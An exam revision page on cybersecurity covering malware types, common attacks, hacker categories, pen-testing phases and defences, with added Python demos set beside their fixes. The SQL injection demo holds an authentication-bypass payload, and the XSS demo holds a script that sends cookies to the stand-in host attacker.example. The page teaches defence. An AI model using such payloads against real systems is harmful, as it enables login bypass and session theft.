Topic 7

Cyber-Attacks & Ethical Hacking

Cybersecurity protects computer systems, networks, and data from digital attacks, theft, and damage. With everything connected online, understanding cyber threats and how to defend against them is critical for every computer user.

A. Cybersecurity & Cyber Threats

What is Cybersecurity?

Protecting systems, networks, and data from digital attack

Term | Definition
Cybersecurity | The practice of protecting computers, servers, networks, and data from digital attacks, unauthorised access, and damage. Also called Information Security (InfoSec), although strictly InfoSec covers information in any form, not just digital.
CIA Triad | The three goals of cybersecurity: Confidentiality (only authorised users can read data), Integrity (data is not altered without permission), Availability (data and systems are accessible when needed).
Cyber Attack | An intentional attempt to damage, disrupt, or gain unauthorised access to a computer system or network.
Vulnerability | A weakness in a system that can be exploited by an attacker.
Threat | Any potential danger to a computer system or its data; a threat becomes an incident when an attacker exploits a vulnerability.
Exploit | A piece of code or technique that takes advantage of a vulnerability to attack a system.
Cybercrime | Criminal activity carried out using computers or the internet: hacking, online fraud, identity theft, cyberbullying.
Cybersecurity
Protecting computers, networks, and data from digital attacks and unauthorised access. Also called Information Security (InfoSec).
CIA Triad — 3 Goals
Confidentiality: Only authorised users can see the data
Integrity: Data is not altered without permission
Availability: Data is accessible when needed
Cyber Attack
Intentional attempt to damage, disrupt, or gain unauthorised access to a system or network.
Vulnerability vs Threat
Vulnerability: A weakness in a system that can be exploited
Threat: A potential danger that could exploit that weakness
Cybercrime
Criminal activity via computers — hacking, fraud, identity theft, cyberbullying, ransomware.
CIA Triad diagram: C = Confidentiality (only authorised users can access the data) · I = Integrity (data is not altered or tampered with) · A = Availability (data is accessible when needed)
⚡ Exam Tips
CIA Triad = Confidentiality, Integrity, Availability — the three goals of cybersecurity.
Vulnerability = a weakness · Threat = potential danger · Exploit = code that uses the vulnerability.
Cybersecurity is also called Information Security (InfoSec).
Cybercrime includes hacking, fraud, identity theft, and cyberbullying.

B. Types of Malware

Malicious Software (Malware)

Software designed to damage, disrupt, or gain unauthorised access

Malware Type | How it Works | Key Feature
Virus | Attaches itself to legitimate files and spreads when infected files are shared or run. Requires human action to spread. | Needs a host file · Spreads via infected files/email attachments
Worm | Self-replicating program that spreads through networks automatically, without needing a host file or human action. | Self-replicates · Spreads through the network on its own · No host needed
Trojan Horse | Malware disguised as legitimate, useful software. Once installed it typically opens a backdoor for attackers. Named after the Greek myth. | Disguised as legitimate software · Does NOT self-replicate · Opens a backdoor
Ransomware | Encrypts the victim's files and demands a ransom payment to restore access. Devastating to organisations. | Encrypts files · Demands payment (usually cryptocurrency)
Spyware | Secretly monitors user activity and collects information (passwords, card numbers, browsing habits) without consent. | Hidden · Steals personal data · Often bundled with free software
Adware | Automatically displays unwanted advertisements. Less harmful but annoying. Often bundled with free software downloads. | Shows unwanted ads · Usually not dangerous
Rootkit | Hides itself deep in the operating system (kernel or lower) to avoid detection, while giving attackers persistent, privileged remote access. | Very hard to detect · Gives admin-level access · Hides from the OS
Keylogger | Records every keystroke typed by the user, capturing passwords, card numbers, and messages. | Records keystrokes · Steals passwords and sensitive data
Botnet | A network of infected computers (bots/zombies) controlled remotely by an attacker to send spam, launch DDoS attacks, or steal data. | Many infected computers · Controlled remotely · Used for attacks
Virus
Attaches to files. Needs human action to spread (opening infected email or file). Has a host file.
Worm
Self-replicating. Spreads through networks automatically — no human action and no host file needed.
Trojan Horse
Disguised as useful software. Opens backdoor for attacker. Does NOT self-replicate.
Ransomware
Encrypts your files and demands payment (usually cryptocurrency) to restore access.
Spyware
Secretly monitors user activity and steals passwords, banking details, and browsing habits.
Adware
Displays unwanted advertisements automatically. Less harmful but annoying. Often bundled with free software.
Rootkit
Hides deep in the OS to avoid detection. Gives attacker persistent, admin-level remote access.
Keylogger
Records every keystroke typed — captures passwords, credit card numbers, and messages.
Botnet
Network of infected computers (zombies) controlled remotely. Used to launch DDoS attacks or send spam.
⚡ Exam Tips
Virus = needs a host file + human action to spread.
Worm = self-replicates through network, NO host file, NO human action needed.
Trojan = disguised as useful software, does NOT self-replicate, opens backdoor.
Ransomware = encrypts files + demands payment (best defence = regular, tested backups with a copy kept offline, out of the attacker's reach).
Spyware = secretly steals personal data.
Rootkit = very hard to detect, hides inside OS.
Adware = displays unwanted ads, usually bundled with free software — less harmful.
Keylogger = records every keystroke to steal passwords and card numbers.
Botnet = network of infected zombie computers controlled remotely.

C. Types of Cyber Attacks

Common Attack Methods

How attackers target systems, networks, and people

Attack | Description
Phishing | Fraudulent emails or messages that appear to come from trusted sources (banks, companies) to trick users into revealing passwords or financial information. The most common social engineering attack.
DoS Attack | Denial of Service: flooding a server with so many requests that it slows down or crashes and becomes unavailable to legitimate users.
DDoS Attack | Distributed Denial of Service: the same as DoS but launched simultaneously from thousands of infected computers (a botnet). Much more powerful, and far harder to block by source address.
Man-in-the-Middle | Attacker secretly intercepts communication between two parties and reads, alters, or steals the data passing between them. Often on unsecured Wi-Fi; authenticated encryption (HTTPS/TLS) is the main defence.
SQL Injection | Attacker enters malicious SQL into a website input field that the application pastes into a database query, so the input runs as code: stealing, deleting, or altering data. Defended by parameterised queries.
Brute Force | Systematically trying every possible password combination until the correct one is found. Simple but effective against short, weak passwords; defeated by long passwords plus rate limiting or account lockout.
Social Engineering | Manipulating people psychologically into revealing confidential information or taking an unsafe action, rather than attacking the computer directly.
Zero-Day Attack | Exploiting a software vulnerability for which no patch exists yet, because the vendor has not yet discovered or fixed it. Extremely dangerous: defenders have had zero days to prepare.
Cross-Site Scripting (XSS) | Injecting malicious scripts into a web page viewed by other users, to steal their session cookies or redirect them. Defended by escaping untrusted output before it is placed in the page.
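Worked example, added to these notes and not part of the original page: the SQL Injection row above, run against an in-memory SQLite table in Python. The users table, the two accounts and the attacker's input string are constructed for the demo; login_vulnerable builds the query by string formatting (the weak version) and login_safe binds the same values with placeholders (the fix).

```python
"""Added example (not from the original page): SQL injection against an
in-memory SQLite login table, vulnerable query beside the parameterised fix.
The table, the users and the passwords are all constructed for this demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data: an in-memory database with two users.
    # Real systems store password hashes, never plaintext; kept plain here
    # only so the injected query's effect is visible.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "Tr0ub4dor&3", "administrator"), ("alice", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    # VULNERABLE: user input is pasted straight into the SQL text, so input
    # containing quotes and SQL keywords changes the query's meaning.
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    # SAFE: '?' placeholders bind the values as data. The driver never
    # interprets them as SQL, so the same payload simply fails to match.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    conn = make_db()
    # Classic authentication-bypass payload: closes the string literal,
    # adds a condition that is always true, and comments out the rest of
    # the query (SQLite treats '--' to end of line as a comment).
    payload_user = "admin' OR '1'='1' --"
    results = {
        "legit_vulnerable": login_vulnerable(conn, "alice", "hunter2"),
        "attack_vulnerable": login_vulnerable(conn, payload_user, "wrong"),
        "legit_safe": login_safe(conn, "alice", "hunter2"),
        "attack_safe": login_safe(conn, payload_user, "wrong"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:18s} -> {row}")
```

With the payload, the vulnerable query becomes `... WHERE username = 'admin' OR '1'='1' --' AND password = 'wrong'`, which matches the admin row without any password; the parameterised version looks for a user literally named `admin' OR '1'='1' --` and finds nothing.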
Phishing
Fake emails/messages pretending to be banks or companies to steal passwords and financial info. Most common social engineering attack.
DoS vs DDoS
DoS: One source floods the server until it crashes
DDoS: Thousands of infected computers (botnet) flood simultaneously — far more powerful
Man-in-the-Middle
Attacker secretly intercepts communication between two parties — reads, alters, or steals data. Common on unsecured Wi-Fi.
SQL Injection
Malicious SQL code entered into website input fields to steal or manipulate database contents.
Brute Force
Systematically tries every possible password combination until the correct one is found. Defeated by long passwords, and by rate limiting or account lockout so that guessing is slow.
Social Engineering
Manipulating people psychologically to reveal confidential info — targets humans, not computers directly. Phishing is a type of social engineering.
Zero-Day Attack
Exploits a vulnerability the software vendor does not yet know about — no patch exists. Extremely dangerous.
Cross-Site Scripting (XSS)
Injects malicious scripts into a web page viewed by other users — steals their session cookies or redirects them to fake sites.
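Worked example, added to these notes and not part of the original page: the reflected XSS described above. A tiny server-side page template inserts a "search term" supplied by the user; render_vulnerable pastes it raw, render_safe escapes it with Python's html.escape. The HTML skeleton, the payload and the attacker host attacker.example are constructed for the demo.

```python
"""Added example (not from the original page): reflected cross-site scripting.
A page template inserts a user-supplied search term; the vulnerable render
pastes it raw, the fixed render escapes it. The skeleton, the payload and
the attacker-controlled host name are constructed for this demo."""
import html
import re

# Constructed page skeleton. In a real app the term comes from a URL
# parameter such as ?q=... and the page is served to everyone who opens the link.
PAGE = "<html><body><h1>Results for: {term}</h1></body></html>"

# Constructed attacker payload: a script that would send the viewer's cookies
# to a hypothetical attacker-controlled host (attacker.example is not real).
PAYLOAD = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_vulnerable(term: str) -> str:
    # VULNERABLE: untrusted text becomes part of the HTML markup itself.
    return PAGE.format(term=term)


def render_safe(term: str) -> str:
    # SAFE: html.escape turns <, >, &, " and ' into entities, so the browser
    # displays the payload as text instead of executing it. quote=True also
    # escapes quotes, which matters when the value lands inside an attribute.
    return PAGE.format(term=html.escape(term, quote=True))


def contains_script(page: str) -> bool:
    # Does the rendered page contain a real <script> tag (as opposed to the
    # harmless text sequence &lt;script&gt;)?
    return bool(SCRIPT_TAG.search(page))


def demo() -> dict:
    return {
        "vulnerable_executes": contains_script(render_vulnerable(PAYLOAD)),
        "safe_executes": contains_script(render_safe(PAYLOAD)),
        "safe_output": render_safe(PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

html.escape is the right tool only for text placed in the HTML body or a quoted attribute; values placed inside JavaScript, CSS or a URL need encoding for that context. Marking the session cookie HttpOnly stops document.cookie from reading it even if a script does run.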
⚡ Exam Tips
Phishing = most common social engineering attack — fake emails pretending to be trusted sources.
DoS = one machine floods a server. DDoS = distributed — many machines (botnet) attack at once.
SQL Injection = database attack via malicious code in input fields.
Brute Force = tries all password combinations; defeated by strong, long passwords plus account lockout or rate limiting.
Zero-Day = unknown vulnerability, no patch available yet — most dangerous type.
Social Engineering = attacks the human, not the machine — phishing is its most common form.
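Worked example, added to these notes and not part of the original page: an online brute-force attack on a 4-digit PIN, first against a checker that accepts unlimited guesses and then against one that locks the account after a few failures, followed by a search-space calculation showing why length defeats brute force. The PIN, the lockout threshold and the guess rate are all constructed for the demo.

```python
"""Added example (not from the original page): brute-forcing a 4-digit PIN
against a naive login and against a login with account lockout, plus the
keyspace arithmetic behind 'long passwords defeat brute force'.
All secrets, thresholds and rates here are constructed for the demo."""
import itertools
import string

SECRET_PIN = "7391"          # constructed victim secret
MAX_FAILURES = 5             # constructed lockout policy
SECONDS_PER_YEAR = 31_557_600


class NaiveLogin:
    """Accepts unlimited guesses: exactly what a brute-force attack needs."""

    def __init__(self, secret: str):
        self._secret = secret
        self.attempts = 0

    def check(self, guess: str) -> bool:
        self.attempts += 1
        return guess == self._secret


class LockoutLogin(NaiveLogin):
    """Same check, but after MAX_FAILURES wrong guesses the account locks
    and every further guess is rejected, right or wrong."""

    def __init__(self, secret: str):
        super().__init__(secret)
        self.failures = 0
        self.locked = False

    def check(self, guess: str) -> bool:
        if self.locked:
            self.attempts += 1
            return False
        ok = super().check(guess)
        if not ok:
            self.failures += 1
            self.locked = self.failures >= MAX_FAILURES
        return ok


def brute_force_pin(login: NaiveLogin, digits: int = 4):
    """Try every PIN from 0000 upwards until one is accepted.
    Returns (pin_found_or_None, guesses_spent)."""
    for combo in itertools.product(string.digits, repeat=digits):
        guess = "".join(combo)
        if login.check(guess):
            return guess, login.attempts
    return None, login.attempts


def keyspace(length: int, alphabet_size: int) -> int:
    """Number of candidate passwords of a given length over a character set."""
    return alphabet_size ** length


def years_to_exhaust(length: int, alphabet_size: int, guesses_per_second: float) -> float:
    """Worst-case years to try every candidate at a given guess rate."""
    return keyspace(length, alphabet_size) / guesses_per_second / SECONDS_PER_YEAR


def demo() -> dict:
    found, spent = brute_force_pin(NaiveLogin(SECRET_PIN))
    locked = LockoutLogin(SECRET_PIN)
    found_locked, spent_locked = brute_force_pin(locked)
    # Constructed rate: ~10 guesses/s is plausible against a web login form;
    # offline cracking of a stolen hash can be many orders of magnitude faster.
    rate = 10.0
    return {
        "naive": (found, spent),
        "lockout": (found_locked, spent_locked, locked.locked),
        "years_4_digit_pin": years_to_exhaust(4, 10, rate),
        "years_8_lowercase": years_to_exhaust(8, 26, rate),
        "years_12_mixed": years_to_exhaust(12, 95, rate),   # 95 printable ASCII chars
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18s} -> {value}")
```

The naive login gives up the PIN after 7392 guesses; the lockout login never does, because the fifth wrong guess locks it and the correct guess is then refused too. The keyspace figures show the same idea from the other side: every extra character multiplies the attacker's work by the alphabet size.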

D. Hacking & Ethical Hacking

Types of Hackers

Classified by intent and permission

White Hat
Legal · With Permission
Ethical hackers hired with owner's permission to find vulnerabilities before criminals do. Also called Penetration Testers.
Black Hat
Illegal · Criminal
Malicious hackers who break into systems without permission for personal gain. Stealing data, money, or causing damage. Criminal activity.
Grey Hat
No Permission · Not Malicious
In between. Hack without permission but without malicious intent — may disclose the vulnerability publicly or charge a fee to fix it.
Blue Hat
External Consultant
Outside security professionals hired to test a system before launch. Similar to White Hat but not permanent employees — contracted for specific tests.
Red Hat
Aggressive · Counter-Attack
Aggressive vigilantes. Instead of reporting Black Hat hackers, they actively attack and shut down the attacker's systems. Extreme white-hat style.
Script Kiddie
No Skill · Uses Scripts
Unskilled individuals who use pre-written hacking tools without understanding how they work. Not a true hacker — no real technical knowledge.
Concept | Explanation
Ethical Hacking | Legally breaking into systems with the owner's written permission to find and fix security vulnerabilities before malicious hackers exploit them. Often used interchangeably with Penetration Testing (Pen Testing).
Penetration Test | A simulated cyber attack on a system, within an agreed scope, to identify vulnerabilities. Follows 5 phases: Reconnaissance → Scanning → Gaining Access → Maintaining Access → Reporting.
CEH | Certified Ethical Hacker, a globally recognised certification for ethical hackers from EC-Council.
OSINT | Open Source Intelligence: gathering information about a target from publicly available sources (social media, websites, public records).
Firewall | Hardware or software that monitors and controls incoming/outgoing network traffic based on security rules. First line of defence.
Intrusion Detection System (IDS) | Monitors network traffic for suspicious activity and alerts administrators. Does NOT block, only detects (a system that also blocks is an Intrusion Prevention System, IPS).

Penetration Testing — 5 Phases

① Reconnaissance: gather information about the target (OSINT)
② Scanning: find open ports, running services, and vulnerabilities
③ Gaining Access: exploit the vulnerabilities
④ Maintaining Access: stay in the system to test the depth of the breach
⑤ Reporting: document all findings and recommend fixes
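Worked example, added to these notes and not part of the original page: the Scanning phase reduced to a TCP connect scan in Python. So that it runs offline and only against something you own, the "target" is a listener the script starts itself on 127.0.0.1; the port numbers are whatever the operating system hands out, and the scanned list is constructed from one open and one closed port.

```python
"""Added example (not from the original page): a TCP connect scan, the
simplest form of the Scanning phase. The target is a listener this script
starts itself on localhost, so nothing outside the machine is touched."""
import socket
import threading
from contextlib import closing


def start_target():
    """Constructed target: listen on an OS-assigned localhost port and accept
    (then immediately drop) connections in a background thread.
    Returns (listening_socket, stop_event)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)          # lets the thread notice the stop event
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:      # socket closed underneath us
                return
            conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, stop


def free_closed_port() -> int:
    """Find a port that is currently closed: bind to port 0 to learn a free
    number, then release it. (A tiny race with other processes; fine for a demo.)"""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def port_is_open(host: str, port: int, timeout: float = 0.5) -> bool:
    """Connect scan: a completed TCP handshake means something is listening.
    connect_ex returns 0 on success and an errno (e.g. ECONNREFUSED) otherwise,
    so a refused or timed-out port simply reads as closed."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def scan(host: str, ports) -> list:
    """Return the sorted list of open ports among the candidates."""
    return sorted(p for p in ports if port_is_open(host, p))


def demo() -> dict:
    target, stop = start_target()
    open_port = target.getsockname()[1]
    closed_port = free_closed_port()
    try:
        found = scan("127.0.0.1", [open_port, closed_port])
    finally:
        stop.set()
    return {"open_port": open_port, "closed_port": closed_port, "found": found}


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the full handshake, so it shows up in the target's logs; real tools such as nmap default to lighter probes for that reason. Scanning hosts you do not own or have written permission to test is itself unauthorised access in most jurisdictions.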
White Hat vs Black Hat
White Hat = ethical hacker (with permission). Black Hat = criminal hacker (without permission).
Ethical Hacking
Legally finding system vulnerabilities WITH owner's permission. Also called Penetration Testing.
Firewall
Controls incoming/outgoing network traffic based on rules. First line of defence against attacks.
⚡ Exam Tips
White Hat = ethical hacker — legal, with owner's permission. Also called Penetration Tester.
Black Hat = criminal hacker — illegal, without permission, for personal gain.
Grey Hat = no permission but no malicious intent — may disclose or charge a fee to fix.
Blue Hat = external consultant hired to test before launch.
Red Hat = aggressively counter-attacks black hat hackers.
Ethical hacking = Penetration Testing (Pen Testing).
CEH = Certified Ethical Hacker (EC-Council certification).

E. Cybersecurity Protection Measures

How to Protect Against Cyber Attacks

Protection Measure | How it Helps
Antivirus Software | Detects, quarantines, and removes malware. Must be kept updated with the latest virus definitions, because signature-based detection only recognises malware it already has a signature for.
Firewall | Monitors and filters network traffic. Blocks unauthorised connections.
Encryption | Converts data into unreadable ciphertext. Even if stolen, the data cannot be read without the key. HTTPS uses encryption.
Strong Passwords | Use long passwords (length matters more than symbols). Never reuse a password across sites. Use a password manager.
Two-Factor Authentication (2FA) | Requires a second verification step beyond the password, e.g. a code from an authenticator app or a hardware security key. SMS codes also count but are the weakest option, since they can be intercepted or redirected (SIM swapping). Much harder to compromise than a password alone.
Software Updates/Patches | Updates fix known security vulnerabilities. Outdated software is a major entry point for attackers.
Backup | Regular backups of important data, with at least one copy kept offline or otherwise out of reach of an attacker who controls the network, and restores tested. If ransomware strikes, you can restore from backup without paying.
VPN | Virtual Private Network: encrypts your internet connection and hides your IP address from the sites you visit (the VPN provider itself still sees your traffic). Protects traffic on public Wi-Fi.
User Awareness Training | Teaching users to recognise phishing, social engineering, and suspicious activity; the human factor is the most exploited weakness.
HTTPS / TLS | Encrypts data between browser and server (TLS is the current protocol; SSL is its deprecated predecessor). The padlock in the address bar means the connection is encrypted, not that the site is trustworthy; phishing sites use HTTPS too.
Antivirus
Detects and removes malware. Must be regularly updated.
Encryption
Converts data into unreadable code. HTTPS uses encryption (padlock in browser).
2FA — Two-Factor Authentication
Password + second step (authenticator app code or hardware key; an SMS code is the weakest option). Much harder to compromise than a password alone.
VPN
Virtual Private Network: encrypts the internet connection and hides your IP from the sites you visit. Protects traffic on public Wi-Fi.
Backup
Regular, tested data backups with a copy kept offline. If ransomware hits, restore from backup without paying the ransom.
⚡ Exam Tips
VPN = Virtual Private Network — encrypts internet connection and hides IP address.
2FA = Two-Factor Authentication — password + second verification step.
Encryption = converts data to unreadable code. HTTPS uses encryption — padlock in browser.
Best defence against ransomware = regular, tested backups with a copy kept offline.
Biggest cybersecurity weakness = human error (clicking phishing links, weak passwords).
Antivirus removes malware. Firewall blocks unauthorised connections. IDS detects intrusions (does NOT block).

Quick Fire Revision

  • CIA Triad stands for: Confidentiality, Integrity, Availability
  • Virus spreads via: Infected files/attachments (needs human action)
  • Worm vs Virus: Worm self-replicates through the network (no host needed)
  • Trojan Horse is disguised as: Legitimate/useful software
  • Ransomware does: Encrypts files and demands payment
  • Spyware secretly does: Monitors the user and steals personal data
  • Keylogger records: Every keystroke (passwords, credit cards)
  • Phishing uses: Fake emails/messages to steal credentials
  • DoS vs DDoS: DoS = one source · DDoS = many machines (botnet)
  • SQL Injection targets: Databases via malicious code in input fields
  • Brute Force attack tries: All possible password combinations
  • White Hat hacker is: Ethical hacker (with owner's permission)
  • Black Hat hacker is: Criminal hacker (without permission)
  • Grey Hat hacker: No permission but no malicious intent
  • Ethical hacking also called: Penetration Testing (Pen Testing)
  • CEH stands for: Certified Ethical Hacker
  • Firewall does: Monitors and filters network traffic
  • Encryption converts data to: Unreadable code (only readable with the key)
  • 2FA stands for: Two-Factor Authentication
  • VPN stands for: Virtual Private Network
  • Best defence against ransomware: Regular, tested backups (copy kept offline)
  • HTTPS padlock means: Encrypted connection (TLS); not proof that the site is legitimate
  • Botnet is: Network of infected computers controlled remotely
  • Zero-Day attack exploits: A vulnerability with no patch available yet
  • Cross-Site Scripting (XSS) does: Injects malicious scripts into web pages to steal cookies
  • Blue Hat hacker is: External consultant hired to test before system launch
  • Red Hat hacker does: Actively attacks and shuts down Black Hat hackers
  • Script Kiddie uses: Pre-written tools with no real technical knowledge
  • OSINT stands for: Open Source Intelligence (public info gathering)
  • IDS stands for: Intrusion Detection System (detects intrusions, does NOT block)
  • Pen Testing follows 5 phases: Reconnaissance · Scanning · Gaining Access · Maintaining Access · Reporting